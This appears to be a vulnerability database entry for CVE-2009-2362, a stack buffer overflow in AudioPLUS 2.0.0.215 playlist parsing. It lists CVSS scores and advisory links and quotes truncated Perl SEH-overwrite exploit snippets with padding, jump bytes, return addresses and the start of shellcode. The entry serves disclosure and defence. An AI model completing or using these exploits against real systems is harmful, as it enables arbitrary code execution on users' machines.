Published: 08/07/2009 Updated: 19/09/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Stack-based buffer overflow in KUDRSOFT AudioPLUS 2.0.0.215 allows remote malicious users to execute arbitrary code via a long string in a (1) .lst or (2) .m3u playlist file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
yukudr audioplus 2.0.0.215

#!/usr/bin/perl # AudioPLUS 200215 (pls) Local buffer Overflow (seh) print "AudioPLUS 200215 (pls) Local buffer Overflow (seh)\n"; my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1="; my $junk="\x41" x 4103; my $nseh="\xEB\x06\x90\x90"; my $seh="\x35\x2F\xD1\x72"; # jmp msacm32drv ebx my $nop="\x90" x 20; my $shellcode= "\xeb\x03 ...

#!/usr/bin/perl # AudioPLUS 200215 (m3u lst ) Universal Seh Overwrite Exploit # first exploiter hack4love wwwmilw0rmcom/exploits/9064 # and this the universal for lst m3u extention # Big Thnx to his0ka my best freind :d # Stack print "AudioPLUS 200215 (m3u lst ) Universal Seh Overwrite Exploit\n"; my $shellcode= "\xeb\x03\x59\xeb ...

#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # AudioPLUS 200215 (m3u / lst File) Local buffer Overflow (seh) # # Greetz to all my friends # form egypt ## easy :d ## Tested on: Windows XP Pro SP2 (EN) ################################################################ my $bof="\x41" x 4116; my $nsh="\xEB\x06\x90\x90"; my $seh="\xb8\x15\xd ...

CWE-119 http://www.vupen.com/english/advisories/2009/1764 http://secunia.com/advisories/35673 http://osvdb.org/55528 http://packetstormsecurity.org/0907-exploits/audioplus-overflow.txt https://exchange.xforce.ibmcloud.com/vulnerabilities/51484 http://www.exploit-db.com/exploits/9064 https://nvd.nist.gov https://www.exploit-db.com/exploits/9070/

CVE-2009-2362

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect